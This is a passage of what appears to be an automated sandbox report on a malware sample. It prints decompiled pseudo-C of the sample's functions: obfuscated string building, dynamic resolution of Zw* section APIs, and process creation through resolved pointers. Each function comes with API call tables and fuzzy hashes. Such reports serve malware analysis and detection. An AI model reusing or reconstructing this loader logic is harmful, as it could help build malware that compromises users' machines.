                                                                                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                                                                                          					_t160 = _t160 + 0xc;
                                                                                                                          					HeapFree( *0x497d270, 0, _v8);
                                                                                                                          				}
                                                                                                                          				_t146 =  *0x497d364; // 0x6ff95b0
                                                                                                                          				_t75 = E04973857(0x497d00a, _t146 + 4);
                                                                                                                          				_t152 = 0;
                                                                                                                          				_v20 = _t75;
                                                                                                                          				if(_t75 == 0) {
                                                                                                                          					L26:
                                                                                                                          					HeapFree( *0x497d270, _t152, _a16);
                                                                                                                          					return _v12;
                                                                                                                          				} else {
                                                                                                                          					_t78 = RtlAllocateHeap( *0x497d270, 0, 0x800);
                                                                                                                          					_v8 = _t78;
                                                                                                                          					if(_t78 == 0) {
                                                                                                                          						L25:
                                                                                                                          						HeapFree( *0x497d270, _t152, _v20);
                                                                                                                          						goto L26;
                                                                                                                          					}
                                                                                                                          					E0497A811(GetTickCount());
                                                                                                                          					_t82 =  *0x497d364; // 0x6ff95b0
                                                                                                                          					__imp__(_t82 + 0x40);
                                                                                                                          					asm("lock xadd [eax], ecx");
                                                                                                                          					_t86 =  *0x497d364; // 0x6ff95b0
                                                                                                                          					__imp__(_t86 + 0x40);
                                                                                                                          					_t88 =  *0x497d364; // 0x6ff95b0
                                                                                                                          					_t148 = E04971974(1, _t143, _a16,  *_t88);
                                                                                                                          					_v28 = _t148;
                                                                                                                          					asm("lock xadd [eax], ecx");
                                                                                                                          					if(_t148 == 0) {
                                                                                                                          						L24:
                                                                                                                          						HeapFree( *0x497d270, _t152, _v8);
                                                                                                                          						goto L25;
                                                                                                                          					}
                                                                                                                          					StrTrimA(_t148, 0x497c2ac);
                                                                                                                          					_push(_t148);
                                                                                                                          					_t94 = E049738CA();
                                                                                                                          					_v16 = _t94;
                                                                                                                          					if(_t94 == 0) {
                                                                                                                          						L23:
                                                                                                                          						HeapFree( *0x497d270, _t152, _t148);
                                                                                                                          						goto L24;
                                                                                                                          					}
                                                                                                                          					_t153 = __imp__;
                                                                                                                          					 *_t153(_t148, _a4);
                                                                                                                          					 *_t153(_v8, _v20);
                                                                                                                          					_t154 = __imp__;
                                                                                                                          					 *_t154(_v8, _v16);
                                                                                                                          					_t100 = E04971922( *_t154(_v8, _t148), _v8);
                                                                                                                          					_a4 = _t100;
                                                                                                                          					if(_t100 == 0) {
                                                                                                                          						_v12 = 8;
                                                                                                                          						L21:
                                                                                                                          						E049747D5();
                                                                                                                          						L22:
                                                                                                                          						HeapFree( *0x497d270, 0, _v16);
                                                                                                                          						_t152 = 0;
                                                                                                                          						goto L23;
                                                                                                                          					}
                                                                                                                          					_t104 = E0497365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                                                                                          					_v12 = _t104;
                                                                                                                          					if(_t104 == 0) {
                                                                                                                          						_t157 = _v24;
                                                                                                                          						_v12 = E04973273(_t157, _a4, _a8, _a12);
                                                                                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                                                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                                                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                                          						_t118 =  *_t157;
                                                                                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                          						E04974AAB(_t157);
                                                                                                                          					}
                                                                                                                          					if(_v12 != 0x10d2) {
                                                                                                                          						L16:
                                                                                                                          						if(_v12 == 0) {
                                                                                                                          							_t106 = _a8;
                                                                                                                          							if(_t106 != 0) {
                                                                                                                          								_t149 =  *_t106;
                                                                                                                          								_t155 =  *_a12;
                                                                                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                                                                                          								_t109 = E04978FB2(_t149, _t149, _t155 >> 1);
                                                                                                                          								_t148 = _v28;
                                                                                                                          								 *_a12 = _t109;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L19;
                                                                                                                          					} else {
                                                                                                                          						if(_a8 != 0) {
                                                                                                                          							L19:
                                                                                                                          							E04974AAB(_a4);
                                                                                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                          								goto L22;
                                                                                                                          							} else {
                                                                                                                          								goto L21;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_v12 = _v12 & 0x00000000;
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}






















































                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 0497611D
                                                                                                                          • wsprintfA.USER32 ref: 0497616D
                                                                                                                          • wsprintfA.USER32 ref: 0497618A
                                                                                                                          • wsprintfA.USER32 ref: 049761B6
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 049761C8
                                                                                                                          • wsprintfA.USER32 ref: 049761E9
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 049761F9
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04976227
                                                                                                                          • GetTickCount.KERNEL32 ref: 04976238
                                                                                                                          • RtlEnterCriticalSection.NTDLL(06FF9570), ref: 0497624C
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(06FF9570), ref: 0497626A
                                                                                                                            • Part of subcall function 04971974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04974653,?,06FF95B0), ref: 0497199F
                                                                                                                            • Part of subcall function 04971974: lstrlen.KERNEL32(?,?,?,04974653,?,06FF95B0), ref: 049719A7
                                                                                                                            • Part of subcall function 04971974: strcpy.NTDLL ref: 049719BE
                                                                                                                            • Part of subcall function 04971974: lstrcat.KERNEL32(00000000,?), ref: 049719C9
                                                                                                                            • Part of subcall function 04971974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04974653,?,06FF95B0), ref: 049719E6
                                                                                                                          • StrTrimA.SHLWAPI(00000000,0497C2AC,?,06FF95B0), ref: 049762A1
                                                                                                                            • Part of subcall function 049738CA: lstrlen.KERNEL32(06FF9B10,00000000,00000000,745EC740,0497467E,00000000), ref: 049738DA
                                                                                                                            • Part of subcall function 049738CA: lstrlen.KERNEL32(?), ref: 049738E2
                                                                                                                            • Part of subcall function 049738CA: lstrcpy.KERNEL32(00000000,06FF9B10), ref: 049738F6
                                                                                                                            • Part of subcall function 049738CA: lstrcat.KERNEL32(00000000,?), ref: 04973901
                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 049762C2
                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 049762CA
                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 049762D8
                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 049762DE
                                                                                                                            • Part of subcall function 04971922: lstrlen.KERNEL32(?,00000000,06FF9B38,00000000,049774FF,06FF9D16,?,?,?,?,?,69B25F44,00000005,0497D00C), ref: 04971929
                                                                                                                            • Part of subcall function 04971922: mbstowcs.NTDLL ref: 04971952
                                                                                                                            • Part of subcall function 04971922: memset.NTDLL ref: 04971964
                                                                                                                          • wcstombs.NTDLL ref: 0497636F
                                                                                                                            • Part of subcall function 04973273: SysAllocString.OLEAUT32(?), ref: 049732AE
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 049763B0
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049763BC
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,06FF95B0), ref: 049763C8
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 049763D4
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 049763E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748877296-0
                                                                                                                          • Opcode ID: abf8024adcc16afe1a537e492875d9360d8c8bdcd99a9a26fb5430952201a44a
                                                                                                                          • Instruction ID: cc3562c39279af9dcf111f0889f6b366fef0874d5a3c29b62af84497a4a227c2
                                                                                                                          • Opcode Fuzzy Hash: abf8024adcc16afe1a537e492875d9360d8c8bdcd99a9a26fb5430952201a44a
                                                                                                                          • Instruction Fuzzy Hash: 9E912571904208EFEB119FA4DC88AAE7FB9FF49364B144175E904A7250D739ED12DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 27%
                                                                                                                          			E04975F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				long _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				void* __esi;
                                                                                                                          				long _t43;
                                                                                                                          				intOrPtr _t44;
                                                                                                                          				intOrPtr _t46;
                                                                                                                          				void* _t48;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t50;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				void* _t58;
                                                                                                                          				void* _t59;
                                                                                                                          				void* _t60;
                                                                                                                          				intOrPtr _t66;
                                                                                                                          				void* _t71;
                                                                                                                          				void* _t74;
                                                                                                                          				intOrPtr _t75;
                                                                                                                          				void* _t77;
                                                                                                                          				intOrPtr _t79;
                                                                                                                          				intOrPtr* _t80;
                                                                                                                          				intOrPtr _t91;
                                                                                                                          
                                                                                                                          				_t79 =  *0x497d37c; // 0x6ff9818
                                                                                                                          				_v24 = 8;
                                                                                                                          				_t43 = GetTickCount();
                                                                                                                          				_push(5);
                                                                                                                          				_t74 = 0xa;
                                                                                                                          				_v16 = _t43;
                                                                                                                          				_t44 = E04973A69(_t74,  &_v16);
                                                                                                                          				_v8 = _t44;
                                                                                                                          				if(_t44 == 0) {
                                                                                                                          					_v8 = 0x497c1ac;
                                                                                                                          				}
                                                                                                                          				_t46 = E049751DA(_t79);
                                                                                                                          				_v12 = _t46;
                                                                                                                          				if(_t46 != 0) {
                                                                                                                          					_t80 = __imp__;
                                                                                                                          					_t48 =  *_t80(_v8, _t71);
                                                                                                                          					_t49 =  *_t80(_v12);
                                                                                                                          					_t50 =  *_t80(_a4);
                                                                                                                          					_t54 = E049775F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                          					_v20 = _t54;
                                                                                                                          					if(_t54 != 0) {
                                                                                                                          						_t75 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          						_t16 = _t75 + 0x497eb10; // 0x530025
                                                                                                                          						 *0x497d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                          						_push(4);
                                                                                                                          						_t77 = 5;
                                                                                                                          						_t57 = E04973A69(_t77,  &_v16);
                                                                                                                          						_v8 = _t57;
                                                                                                                          						if(_t57 == 0) {
                                                                                                                          							_v8 = 0x497c1b0;
                                                                                                                          						}
                                                                                                                          						_t58 =  *_t80(_v8);
                                                                                                                          						_t59 =  *_t80(_v12);
                                                                                                                          						_t60 =  *_t80(_a4);
                                                                                                                          						_t91 = E049775F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                          						if(_t91 == 0) {
                                                                                                                          							E04974AAB(_v20);
                                                                                                                          						} else {
                                                                                                                          							_t66 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          							_t31 = _t66 + 0x497ec30; // 0x73006d
                                                                                                                          							 *0x497d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                          							 *_a16 = _v20;
                                                                                                                          							_v24 = _v24 & 0x00000000;
                                                                                                                          							 *_a20 = _t91;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					E04974AAB(_v12);
                                                                                                                          				}
                                                                                                                          				return _v24;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 04975F79
                                                                                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04975FB9
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 04975FC2
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 04975FC9
                                                                                                                          • lstrlenW.KERNEL32(80000002), ref: 04975FD6
                                                                                                                          • lstrlen.KERNEL32(?,00000004), ref: 04976036
                                                                                                                          • lstrlen.KERNEL32(?), ref: 0497603F
                                                                                                                          • lstrlen.KERNEL32(?), ref: 04976046
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0497604D
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CountFreeHeapTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2535036572-0
                                                                                                                          • Opcode ID: 14dd7552d1e2f29f1b67b0fb786b9941ddcecb2bcc6e6a9ca3909202bee6ae01
                                                                                                                          • Instruction ID: e0f4cd373915de04d505b09ff97a0eba69ef2a7954250ef206385096789ccc98
                                                                                                                          • Opcode Fuzzy Hash: 14dd7552d1e2f29f1b67b0fb786b9941ddcecb2bcc6e6a9ca3909202bee6ae01
                                                                                                                          • Instruction Fuzzy Hash: 9D414772900209FBDF12AFA5CC09D9E7FB5EF84358F0540A5EA04A7211D736EE11EB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E04971000(void* __eax, void* __ecx) {
                                                                                                                          				long _v8;
                                                                                                                          				char _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* _v28;
                                                                                                                          				long _v32;
                                                                                                                          				void _v104;
                                                                                                                          				char _v108;
                                                                                                                          				long _t36;
                                                                                                                          				intOrPtr _t40;
                                                                                                                          				intOrPtr _t47;
                                                                                                                          				intOrPtr _t50;
                                                                                                                          				void* _t58;
                                                                                                                          				void* _t68;
                                                                                                                          				intOrPtr* _t70;
                                                                                                                          				intOrPtr* _t71;
                                                                                                                          
                                                                                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                          				_t69 =  *_t1;
                                                                                                                          				_t36 = E04974837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                          				_v8 = _t36;
                                                                                                                          				if(_t36 != 0) {
                                                                                                                          					L12:
                                                                                                                          					return _v8;
                                                                                                                          				}
                                                                                                                          				E0497A938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                          				_t40 = _v12(_v12);
                                                                                                                          				_v8 = _t40;
                                                                                                                          				if(_t40 == 0 && ( *0x497d298 & 0x00000001) != 0) {
                                                                                                                          					_v32 = 0;
                                                                                                                          					asm("stosd");
                                                                                                                          					asm("stosd");
                                                                                                                          					asm("stosd");
                                                                                                                          					_v108 = 0;
                                                                                                                          					memset( &_v104, 0, 0x40);
                                                                                                                          					_t47 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t18 = _t47 + 0x497e3b3; // 0x73797325
                                                                                                                          					_t68 = E04972291(_t18);
                                                                                                                          					if(_t68 == 0) {
                                                                                                                          						_v8 = 8;
                                                                                                                          					} else {
                                                                                                                          						_t50 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          						_t19 = _t50 + 0x497e760; // 0x6ff8d08
                                                                                                                          						_t20 = _t50 + 0x497e0af; // 0x4e52454b
                                                                                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                          						if(_t71 == 0) {
                                                                                                                          							_v8 = 0x7f;
                                                                                                                          						} else {
                                                                                                                          							_v108 = 0x44;
                                                                                                                          							E049734C7();
                                                                                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                          							_push(1);
                                                                                                                          							E049734C7();
                                                                                                                          							if(_t58 == 0) {
                                                                                                                          								_v8 = GetLastError();
                                                                                                                          							} else {
                                                                                                                          								CloseHandle(_v28);
                                                                                                                          								CloseHandle(_v32);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						HeapFree( *0x497d270, 0, _t68);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t70 = _v16;
                                                                                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                          				E04974AAB(_t70);
                                                                                                                          				goto L12;
                                                                                                                          			}

                                                                                                                          0x049710e1
                                                                                                                          0x049710fb
                                                                                                                          0x049710e3
                                                                                                                          0x049710ec
                                                                                                                          0x049710f1
                                                                                                                          0x049710f1
                                                                                                                          0x049710e1
                                                                                                                          0x0497110f
                                                                                                                          0x0497110f
                                                                                                                          0x04971087
                                                                                                                          0x0497111e
                                                                                                                          0x04971127
                                                                                                                          0x0497112b
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04974837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0497101C,?,00000001,?,?,00000000,00000000), ref: 0497485C
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0497487E
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04974894
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049748AA
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049748C0
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049748D6
                                                                                                                          • memset.NTDLL ref: 0497106A
                                                                                                                            • Part of subcall function 04972291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04971083,73797325), ref: 049722A2
                                                                                                                            • Part of subcall function 04972291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 049722BC
                                                                                                                          • GetModuleHandleA.KERNEL32(4E52454B,06FF8D08,73797325), ref: 049710A0
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 049710A7
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0497110F
                                                                                                                            • Part of subcall function 049734C7: GetProcAddress.KERNEL32(36776F57,04975B13), ref: 049734E2
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 049710EC
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 049710F1
                                                                                                                          • GetLastError.KERNEL32(00000001), ref: 049710F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3075724336-0
                                                                                                                          • Opcode ID: 460010af350e0433258078f889a964e0746ba4ebf1aa55ede2d3c92b02efbd23
                                                                                                                          • Instruction ID: ffd2d35811c203252d7b7a12e0b670eafff411463d5007ccc656535f7dd199cf
                                                                                                                          • Opcode Fuzzy Hash: 460010af350e0433258078f889a964e0746ba4ebf1aa55ede2d3c92b02efbd23
                                                                                                                          • Instruction Fuzzy Hash: 3E314FB6904208BFDB11AFE4DC89DAEBFBCEF44344F104475E605A7211D634AD45DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 63%
                                                                                                                          			E04971974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _t9;
                                                                                                                          				intOrPtr _t13;
                                                                                                                          				char* _t28;
                                                                                                                          				void* _t33;
                                                                                                                          				void* _t34;
                                                                                                                          				char* _t36;
                                                                                                                          				intOrPtr* _t40;
                                                                                                                          				char* _t41;
                                                                                                                          				char* _t42;
                                                                                                                          				char* _t43;
                                                                                                                          
                                                                                                                          				_t34 = __edx;
                                                                                                                          				_push(__ecx);
                                                                                                                          				_t9 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          				_t1 = _t9 + 0x497e62c; // 0x253d7325
                                                                                                                          				_t36 = 0;
                                                                                                                          				_t28 = E049743A8(__ecx, _t1);
                                                                                                                          				if(_t28 != 0) {
                                                                                                                          					_t40 = __imp__;
                                                                                                                          					_t13 =  *_t40(_t28);
                                                                                                                          					_v8 = _t13;
                                                                                                                          					_t41 = E049775F6(_v8 +  *_t40(_a4) + 1);
                                                                                                                          					if(_t41 != 0) {
                                                                                                                          						strcpy(_t41, _t28);
                                                                                                                          						_pop(_t33);
                                                                                                                          						__imp__(_t41, _a4);
                                                                                                                          						_t36 = E04975601(_t34, _t41, _a8);
                                                                                                                          						E04974AAB(_t41);
                                                                                                                          						_t42 = E0497756E(StrTrimA(_t36, "="), _t36);
                                                                                                                          						if(_t42 != 0) {
                                                                                                                          							E04974AAB(_t36);
                                                                                                                          							_t36 = _t42;
                                                                                                                          						}
                                                                                                                          						_t43 = E049726DD(_t36, _t33);
                                                                                                                          						if(_t43 != 0) {
                                                                                                                          							E04974AAB(_t36);
                                                                                                                          							_t36 = _t43;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					E04974AAB(_t28);
                                                                                                                          				}
                                                                                                                          				return _t36;
                                                                                                                          			}















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 049743A8: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,0497198E,253D7325,00000000,00000000,745EC740,?,?,04974653,?), ref: 0497440F
                                                                                                                            • Part of subcall function 049743A8: sprintf.NTDLL ref: 04974430
                                                                                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04974653,?,06FF95B0), ref: 0497199F
                                                                                                                          • lstrlen.KERNEL32(?,?,?,04974653,?,06FF95B0), ref: 049719A7
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • strcpy.NTDLL ref: 049719BE
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 049719C9
                                                                                                                            • Part of subcall function 04975601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,049719D8,00000000,?,?,?,04974653,?,06FF95B0), ref: 04975618
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04974653,?,06FF95B0), ref: 049719E6
                                                                                                                            • Part of subcall function 0497756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,049719F2,00000000,?,?,04974653,?,06FF95B0), ref: 04977578
                                                                                                                            • Part of subcall function 0497756E: _snprintf.NTDLL ref: 049775D6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                          • String ID: =
                                                                                                                          • API String ID: 2864389247-1428090586
                                                                                                                          • Opcode ID: 597a986f5c575f2d15974d84780edbb15198a08e6bb3dc06d8252dd406fdfbdd
                                                                                                                          • Instruction ID: 297b0382c30d9c09d63ff6222a5785509a90651b25b1f5eb61b575d8a5ffcf50
                                                                                                                          • Opcode Fuzzy Hash: 597a986f5c575f2d15974d84780edbb15198a08e6bb3dc06d8252dd406fdfbdd
                                                                                                                          • Instruction Fuzzy Hash: 8611A033601624679A16BBA88C85C6E3BBD9FC56A83054135FA05AB201DE38FD0297A4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 04971AF6
                                                                                                                          • SysAllocString.OLEAUT32(0070006F), ref: 04971B0A
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 04971B1C
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04971B84
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04971B93
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04971B9E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 344208780-0
                                                                                                                          • Opcode ID: 93ef73b25ab3d5c711f7cc68267d37b0ff8f9ea3bd68cfa4f32174cfb3f150fe
                                                                                                                          • Instruction ID: 5d18ebce04dd464e53cbc39a835294f47ee1af863b8039adb36e2df6c2a15a74
                                                                                                                          • Opcode Fuzzy Hash: 93ef73b25ab3d5c711f7cc68267d37b0ff8f9ea3bd68cfa4f32174cfb3f150fe
                                                                                                                          • Instruction Fuzzy Hash: 25415D36900609AFDB01DFB8D845AAEB7B9EF89311F144476E910EB210EB71ED05CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04974837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _t23;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				_Unknown_base(*)()* _t28;
                                                                                                                          				intOrPtr _t30;
                                                                                                                          				_Unknown_base(*)()* _t32;
                                                                                                                          				intOrPtr _t33;
                                                                                                                          				_Unknown_base(*)()* _t35;
                                                                                                                          				intOrPtr _t36;
                                                                                                                          				_Unknown_base(*)()* _t38;
                                                                                                                          				intOrPtr _t39;
                                                                                                                          				_Unknown_base(*)()* _t41;
                                                                                                                          				intOrPtr _t44;
                                                                                                                          				struct HINSTANCE__* _t48;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          
                                                                                                                          				_t54 = E049775F6(0x20);
                                                                                                                          				if(_t54 == 0) {
                                                                                                                          					_v8 = 8;
                                                                                                                          				} else {
                                                                                                                          					_t23 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t1 = _t23 + 0x497e11a; // 0x4c44544e
                                                                                                                          					_t48 = GetModuleHandleA(_t1);
                                                                                                                          					_t26 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t2 = _t26 + 0x497e782; // 0x7243775a
                                                                                                                          					_v8 = 0x7f;
                                                                                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                          					 *(_t54 + 0xc) = _t28;
                                                                                                                          					if(_t28 == 0) {
                                                                                                                          						L8:
                                                                                                                          						E04974AAB(_t54);
                                                                                                                          					} else {
                                                                                                                          						_t30 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          						_t5 = _t30 + 0x497e76f; // 0x614d775a
                                                                                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                          						 *(_t54 + 0x10) = _t32;
